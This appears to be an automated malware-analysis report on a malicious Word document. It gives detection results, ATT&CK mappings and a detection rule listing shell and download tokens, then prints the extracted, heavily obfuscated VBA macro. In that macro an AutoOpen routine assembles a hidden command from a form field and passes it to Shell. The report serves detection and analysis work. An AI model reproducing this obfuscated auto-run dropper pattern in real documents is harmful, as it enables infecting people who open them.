MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of a Shell call within the VBA code, suggesting an attempt to execute arbitrary commands. The macro is obfuscated, but the presence of 'autoopen' and 'Shell' calls, along with references to cmd.exe and PowerShell, strongly suggests it's designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Malware.Valyria-6786330-0' further supports its malicious nature.
Heuristics 10
-
ClamAV: Doc.Malware.Valyria-6786330-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6786330-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7708 bytes |
SHA-256: 2cbb8b0926b1c17771262d686168f534df404019329b5c7bc039e72cec21a020 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
213 of 250 identifiers look randomly generated (e.g. 'kfTOukFwHWUGOinhVWiGBXfk') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lQknRLjWSswoaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
wIkJMutiz
End Sub
Attribute VB_Name = "wEwXqkddllPSQ"
Function wIkJMutiz()
On Error Resume Next
Set qtZYbMPPHkhoaONcofJj = jQOGabknnMCMUwTAVhIwAP
Select Case pJJRtAHrloqGdLRA
Case 244070039
bTXfcGPtbSwBnlUEYwRJ = njVRXdrqpDhXQYvpKhCCzYo
jBFmYmUjboonBOEdXDmPQdW = 83998068
OOPOHrOrbhWYFRDiwvc = HnvdZiwmZcFfsMKXFUTwa
Case 313935757
hiFSlijSitcRbSmpcvb = CByte(zbrfsHfdibfJMNOvT)
KDtKXlPviETirBwd = ChrW(GqZZiDDoGOTFNEqWPlX)
pDFQwYaJzkiKimIEunf = Log(qVRXwqUAcIbPbE)
End Select
Set UtDpjzKEVRRCpWCBLzNUYr = qTqRfwlmpuflJWrKIEf
Select Case joQvoXWljiSPcUN
Case 146343180
iiGjibHKksfTmEQtjpCCuc = bADHcPJpJVUaZZZ
NJlEirRziCWtiKT = 314038808
WfjbTfubDVzRdqU = kptJYdjiFdZtPKwB
Case 163401679
DtqdtiqdbVTfALCjuU = CByte(mjsvAVqFBLsWwtImaTH)
OSvBOOadNqfPibmoKwpHDYoR = ChrW(wXmrZbQnZLTkrhlvNrKfc)
UGTbbdzsqddSPqoloOPcEPS = Log(TRDLpjdmFFDfYz)
End Select
Set TZcSXzscDVzdmoC = fkhjRzfKiZMNouuj
Select Case wYzwfQHjlGHzRiDV
Case 261131958
bbuoUuSkzmioJbNS = PFOAUZDfsXMRvIrAjSHRJE
fuSVBzzjjzpnQZ = 91229143
CqJbWGSCinndIGB = KCiFCEChvrcSFUbbSLEa
Case 5660799
jZcPrNJUYdzLcNqIFwob = CByte(fdzzJMMKzBbdhVJcmMoX)
SzUtsNkJFGlZwBvcRiB = ChrW(JbbWhvshjSlzDDMdfDRzbBrv)
EjTNAUinaSrXwMwUDdnUmW = Log(pSzORBVHjjjdMYTjzHLclUG)
End Select
Set jTDwUwGbmjJEIDfnoRtvqo = afpURFuQVAzKIYiqwXlKTuK
Select Case OwRBatazrccRiipWrQ
Case 260967243
ItXPFazXFdWfVW = SospcaASfvRMSiO
DHGKVbBwzwCtNGzwH = 161216422
izaLdIarUoOfpqLTYO = krmwpjYGEZwUEtMj
Case 129240892
wdBvjhIlQMDCmYiwofvC = CByte(iECVSVTKldJrqckJpHFoE)
LCCmZmIFjlQrRYzZR = ChrW(obijuLwwzmwYqOjO)
zTjwjCjwYawKLJPqtzdkbIr = Log(cpVGIvCKCfAGlPIYwnVkzm)
End Select
Set IOMNtkdzqBIoDt = dzIkpYodnJFVqKmhspQh
Select Case JQVBSYKPrDZwWpYpwHc
Case 132176974
YEoPmoEUPzmMFThmiWAiO = FjZTVOstioMpkMhmjjGvbEmj
VqCPkcpWcwIpTTpbV = 114686649
zPjVEwqRYTUBtqCzXpdzMXTI = ZzNPQTFmpjCmUzTt
Case 71227000
DHzOwQTSlsTlcwaHf = CByte(dBHzOOEGANCrKDBFQBQKwwww)
NTEGFLNSVQJJDsiKrQFPu = ChrW(PjXjZqUzhFJSBvAAuCpZo)
svNJiAHfqjnjDUjZmWzViE = Log(krmKrWDZUsbrbT)
End Select
Set zdMpPMIHwOLhnMPL = SNLQjofSVHrpRECZ
Select Case ovhmhiqAGzTAisCmf
Case 277513001
iwQojXuEQSjKIIZYTdY = iUQcpMRmOpCmOauSXGAPm
ZiZoKsJUiIGEzJjozUFH = 277042229
PuwhNGANcJwAvhCBBYd = GufJdlljHfJfowTfrdfCUVf
Case 324792420
zOzlzThiwVVPnEb = CByte(RFzASMwNXJXtbZkOhC)
XmzJLcBrcwQEZEhCPizn = ChrW(RlOownDWkGhlYEiTwlXRU)
PGFwptWVfkOuFBjVPo = Log(VsrjTBzwjTzZVRzVHjzwJzPb)
End Select
Const XsiLCDnVQ = 0
Set NElwOqSowzjVlnFfmTokB = pvFsuQQRRfwpQqjJkGHAHv
Select Case KjfFPlvsuhbOprWwCYjhB
Case 161699015
XOwcihdBftKvLOKAjWnCIocq = OKEbbOklkHqQIMKQf
UfvLhrXzKOWnimIKUWYZDfaJ = 175697927
TjXKcldsHKWDdMD = EVPwZEIwrosFspFmkaY
Case 265482981
AllKpiznRtLWcbEtiiP = CByte(YSotXASFjSDoPzDjilj)
KLaujjPOBtGrJNDhzrn = ChrW(MsDzqXGdXUOswpQNstMolD)
qLLfCvVmmwuNSH = Log(EJcmrjiOtTzqpEfzDIo)
End Select
Set fcsbQMiQCHOtFzoY = VWvBKoHzDaNEacPYBzBnOJto
Select Case dTnuBtlzEKUCLUolcNmU
Case 78999373
fwVEBnkkMcHYhUUECjb = VSuVpcNClvHTRBo
YzszNUzrunnTQXKFtEGNDz = 93170079
aiwQVoGjjjjFoitAUDb = ptlOlBaMvbkYiT
Case 154795001
WjWFjHmkrFROKFsAYLjj = CByte(kfTOukFwHWUGOinhVWiGBXfk)
BpijAXkrimBCrlWh = ChrW(jiwHwaETDpAZuMAiDtvWMH)
kPjsmiikLZNnwoDFPdQzijSn = Log(AUosbLbcjMsPiSoYEoz)
End Select
Set IVuVwJnzqbQCYWb = lITBGjYLIbAXsobW
Select Case qqiZQiLiBBPfoMGCh
Case 296296185
zBAcwiMXIQFCztlijskV = IWFfJfTPuUKvzXPqOlqD
COwwPlDdZJwXzqf = 309760530
nCtHOvuHBWVrSHtSWGHIjutQ = UKOYzhjvQwoJAnSCrNPhm
Case 44670684
DEdjYmRsIcVulj = CByte(EpmvBIFIWToGojiizNHLT)
zLJzFfhithWIJavqEu = ChrW(vHQjjcLitWjiUPjramBCabsa)
jfXDnIINNYNhccX = Log(AnHMDBtZjUDDsWTOqbwzobF)
End Select
Set YKddUFVHRiLnJKswNm = cUzjZbUiYwBrBJYurMi
Select Case tGOjqjZOJTiBwNSD
Case 173200272
DBAawLPnKdkQAlibfVFO = qBGVERAsnrVTNIhKTJDUCY
dsSsWXhwzMnMzuFstOvWlPwm = 191103109
RLLCtnRFcclZiVGvXHawhPOR = FHCKNvfPZGVkuSAu
Case 305682072
cGTkaQqspMjPBzuso = CByte(PuPjGKEOkKdpZBmwlLqU)
mUVGTiJFYqBdUfzBvAJj = ChrW(jfOzmfdCLiCTzdau)
mbvJLUcLFVnwpLjoVFo = Log(GjCjCMHwJVCYHWN)
End Select
iBSDBPPH = lQknRLjWSswoaR.TextBox1 + zUTEFUq + HqWKwK + aokNE + qAjaFZht + RwQmX + uCDYWtY + fddXOKqG + dECAGrXS + XqiQjEZ + uvwLhku + NdRPOS + hvZmFE
Set NNdGcQIiTSCVHYOUzuUBVZG = LzBQktSrkKklEBwafk
Select Case miSXjoJwKicYnGHufPrzZA
Case 72631735
zncPwwuVlkTotZSbbvHJI = wizGQLomPmXhZvMuzMoGn
nSBFwPWisBcLrz = 114911384
hjhwVhQLAWPhvuVBwtriFLO = QluVENEOcHiEZohGCpF
Case 175768003
pizjbNwFmmWUIi = CByte(mvHmRAEoPQbJLlcQFnYbD)
ocAGIqVIkRGwTHhSJzkuiQAD = ChrW(UJWQhjHjqGfmLrOSHjKDMS)
iniZqJNYcwTojzsChw = Log(cACfzHWbakpAZBnnc)
End Select
Set GNviLTHUVrwpqtPu = QpHAcFWAqBjSbOjZbhZAObZE
Select Case fflFJakuHnwALiHZiURbCud
Case 108125856
OLqujpQCFzZlvhawY = bhYPDSajGHdslCUouO
AXzizFjhojnqfdaBirwIYTz = 232343188
ZNMXQGnMCXvdzaJ = kmATQwOKAmwvGVjXOZ
Case 162020694
UKYczicFiYjRolojzQsazBW = CByte(KrFjrYPaBRBZOXTlVIfc)
fGUhzYwjzsTnuS = ChrW(ZwOGJJPXjOSbwHF)
VubfkkwrzQuEYilUFLMZtZS = Log(PjlThwBYsCztTnXozXGsOLw)
End Select
zWlvjzw = Array(hPBzfKC, VLWlsB, nXbWSa, Interaction _
_
_
_
_
_
_
_
.Shell(iBSDBPPH, XsiLCDnVQ), DkjpjaP)
Set GssNhiLFaqkKBBcGB = VMPjMbrcUNBznoZu
Select Case ljktcBiIzSnaprnziwdz
Case 173283479
QVEOzEcDwkGXrXQQtLjX = IDBiWNwEpwuDFSPoN
ifuWDUSAQjSFST = 16938488
HRCjbrizHoLTlEBbf = CrVmAhMVwPljibB
Case 272539931
zmdcmBuOOIwOLhqZ = CByte(RKvVQUWFuPNXKkSw)
DpCfPqaYlZOGlhuKTKqupjR = ChrW(WsljrEYjSRdBXfB)
UwivIzIiSMqabBEWYv = Log(WFtjhBhoUEtnnIW)
End Select
Set wXuzMWPLYADiwbzkPh = MuUwadFFRpHsWZcYdUXJwAo
Select Case azifiwuTuASYdbT
Case 142005449
QwWRIhFTCTQsXwM = OVcwZaUvnzWGDuB
BCfBRpSQZLccdb = 149594902
GSPFrWhqibdKLw = HSPqVRKoYDMZNwrRM
Case 178018776
zkfvJfUpXqLIFavUK = CByte(kBmwiqCizTrmJRjsz)
cWFLBbmzNvGwSihCbZjC = ChrW(otihAwlhuYMbPsn)
ZzKJjdHYwBNEGqJ = Log(wYndadAdBQTWuXDm)
End Select
Set EmWRFHiVQiMEZcmcdB = KfKjKfowRQERHH
Select Case lnFhmrnOKhhNJfWlTkDwotGM
Case 251990940
KMFLREwdrwWwPIWQA = cSfQuflhEJHrhtvVhaJwPdQj
XOWVubYsGjUluSaakznVAR = 194471199
tbwGCjwBzcWQOM = hjwbJbjmIjYfidKn
Case 43792362
VbSfRqWkSlSvJLYoFmBpT = CByte(KpoWiEUYooQftlrCRHE)
IzUMaMHpXYlQRvQdrvM = ChrW(QuzdfiSnzDUtluRMU)
wRwiAPCzNzUOLWvlIOA = Log(jvuUsUErfWiEJPwuWlthajQ)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.